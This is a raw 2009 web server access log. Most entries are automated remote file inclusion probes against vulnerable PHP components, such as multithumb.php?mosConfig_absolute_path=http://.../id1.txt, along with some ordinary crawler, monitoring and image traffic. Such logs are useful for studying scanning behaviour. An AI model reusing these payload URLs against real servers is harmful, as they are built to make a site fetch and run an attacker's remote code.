89.254.130.92 - - [22/Jun/2009:06:41:51 -0400] "GET /logs/access_log.Q108081200 HTTP/1.1" 404 224 "http://www.google.lv/search?hl=lv&ei=0l4_SsaRAtyPsAbBhc2FAQ&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=semin%C4%81ri+parikmaher&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; lv; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 (.NET Client 3.5.30729.01)"
89.254.130.92 - - [22/Jun/2009:06:41:51 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; lv; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 (.NET Client 3.5.30729.01)"
89.254.130.92 - - [22/Jun/2009:06:41:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; lv; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 (.NET Client 3.5.30729.01)"
74.6.17.151 - - [22/Jun/2009:06:41:59 -0400] "GET /logs/error_log.Q109031000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.200.54 - - [22/Jun/2009:06:43:02 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:43:03 -0400] "GET /?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:43:03 -0400] "GET /logs/?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:43:05 -0400] "GET /logs/access_log.Q109061500%20%20/?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:06:43:10 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:43:55 -0400] "GET /logs/error_log.Q108040600///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
217.147.29.190 - - [22/Jun/2009:06:43:57 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:43:57 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:43:57 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:06:44:04 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:45:35 -0400] "GET /logs/access_log.Q109051900/?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.239.227.229 - - [22/Jun/2009:06:45:35 -0400] "GET /logs/error_log.Q109060200///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
217.147.29.190 - - [22/Jun/2009:06:46:05 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:46:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [22/Jun/2009:06:46:09 -0400] "GET /logs/access_log.Q109052900%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:46:11 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:46:12 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:46:12 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:46:27 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.66.69.183 - - [22/Jun/2009:06:47:10 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
222.162.115.67 - - [22/Jun/2009:06:47:34 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:47:34 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:47:34 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:47:41 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:47:41 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:47:41 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:47:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:47:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:47:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.162.115.67 - - [22/Jun/2009:06:47:52 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:48:05 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.16.182.130 - - [22/Jun/2009:06:49:17 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.16.182.130 - - [22/Jun/2009:06:49:23 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:49:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:49:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:49:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.98.209.71 - - [22/Jun/2009:06:49:56 -0400] "GET /rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:49:56 -0400] "GET /logs/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:49:56 -0400] "GET /logs/access_log.Q109051200%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:50:10 -0400] "GET /logs/config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:50:10 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:50:10 -0400] "GET /config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:50:13 -0400] "GET /logs/access_log.Q109060300%20%20/config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:50:22 -0400] "GET /logs/error_log.Q109050900%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:06:50:58 -0400] "GET /logs/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:06:50:58 -0400] "GET /logs/access_log.Q109051200%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:06:50:58 -0400] "GET /rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:51:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.162.115.67 - - [22/Jun/2009:06:51:47 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:51:56 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:52:01 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:06:52:12 -0400] "GET /logs/error_log.Q109051200%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:52:14 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:52:14 -0400] "GET /logs/access_log.Q109060300/config.php?path_to_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:52:24 -0400] "GET /logs/error_log.Q109051200/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:52:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:52:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:52:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
58.227.193.198 - - [22/Jun/2009:06:53:15 -0400] "GET /rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:06:53:15 -0400] "GET /logs/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:06:53:15 -0400] "GET /logs/access_log.Q109050900%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:53:16 -0400] "GET /logs/access_log.Q109051200%20%20/rss.php?phpraid_dir=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:53:16 -0400] "GET /logs/rss.php?phpraid_dir=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:06:53:16 -0400] "GET /rss.php?phpraid_dir=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
155.212.232.66 - - [22/Jun/2009:06:53:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:53:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:53:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:53:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
58.227.193.198 - - [22/Jun/2009:06:53:44 -0400] "GET /logs/error_log.Q109051200%20%20/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:15 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:15 -0400] "GET /logs/access_log.Q109051100///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:15 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:17 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:17 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:55:17 -0400] "GET /logs/access_log.Q109051100///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:56:02 -0400] "GET /logs/access_log.Q109051500///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:03 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:03 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:03 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:56:03 -0400] "GET /logs/access_log.Q109051500///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:56:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [22/Jun/2009:06:56:18 -0400] "GET ///?_PHPLIB[libdir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:56:19 -0400] "GET /logs///?_PHPLIB[libdir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6516 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:06:56:19 -0400] "GET /logs/access_log.Q109050700%20%20///?_PHPLIB[libdir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:27 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:27 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:27 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:56:36 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:56:36 -0400] "GET /logs/access_log.Q109053100//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:56:36 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:56:36 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:56:56 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:06:57:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:57:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:06:57:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.160.79.161 - - [22/Jun/2009:06:57:11 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:57:21 -0400] "GET /logs/access_log.Q109060100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:57:34 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:57:34 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:06:57:34 -0400] "GET /logs/access_log.Q109051100%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
155.212.232.66 - - [22/Jun/2009:06:57:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:57:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:57:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [22/Jun/2009:06:57:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
69.64.89.139 - - [22/Jun/2009:06:58:09 -0400] "GET /logs/access_log.Q109060100%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:58:31 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:06:58:31 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:06:59:00 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:06:59:01 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:06:59:01 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:06:59:20 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
155.212.232.66 - - [22/Jun/2009:07:00:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [22/Jun/2009:07:00:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [22/Jun/2009:07:00:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [22/Jun/2009:07:00:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
211.43.212.9 - - [22/Jun/2009:07:00:43 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:43 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:43 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:52 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:52 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:52 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
